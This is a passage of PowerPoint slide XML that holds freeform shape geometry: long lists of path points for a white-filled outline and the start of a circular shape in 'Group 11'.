                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494" y="779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495" y="779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495" y="778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495" y="778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504" y="777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519" y="773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529" y="771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537" y="769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545" y="767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551" y="765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553" y="764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553" y="764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567" y="759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576" y="755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576" y="755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582" y="753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589" y="749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611" y="737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614" y="736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614" y="736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619" y="733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625" y="729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638" y="720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651" y="710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655" y="708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655" y="708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661" y="703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668" y="697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668" y="697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671" y="694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671" y="694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671" y="694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681" y="685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683" y="683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685" y="681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685" y="681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686" y="680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686" y="680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695" y="671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695" y="670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696" y="670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696" y="670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706" y="658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733" y="621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748" y="594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760" y="566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771" y="536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778" y="505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780" y="490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773" y="355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769" y="339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763" y="324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460" y="100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424" y="100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149" y="615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168" y="644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216" y="696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216" y="696"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5170265" y="1554861"/>
            <a:ext cx="1096423" cy="1096804"/>
            <a:chOff x="5170265" y="1554861"/>
            <a:chExt cx="1096423" cy="1096804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5170265" y="1554861"/>
              <a:ext cx="1096423" cy="1096804"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1482" h="1482">
                  <a:moveTo>
                    <a:pt x="1482" y="742"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479" y="818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467" y="890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424" y="1029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1409" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393" y="1094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374" y="1126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1335" y="1185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313" y="1213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1290" y="1240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240" y="1290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213" y="1313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184" y="1335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="1356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126" y="1375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094" y="1393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063" y="1409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996" y="1437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962" y="1449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890" y="1467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854" y="1473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818" y="1479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780" y="1481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="1482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="1482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704" y="1481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666" y="1479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="1473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="1467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521" y="1449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="1437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420" y="1409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="1393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="1375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="1356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="1335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="1313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="1290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="1240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="1213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="1185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="1126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="1094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="1029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="666"/>
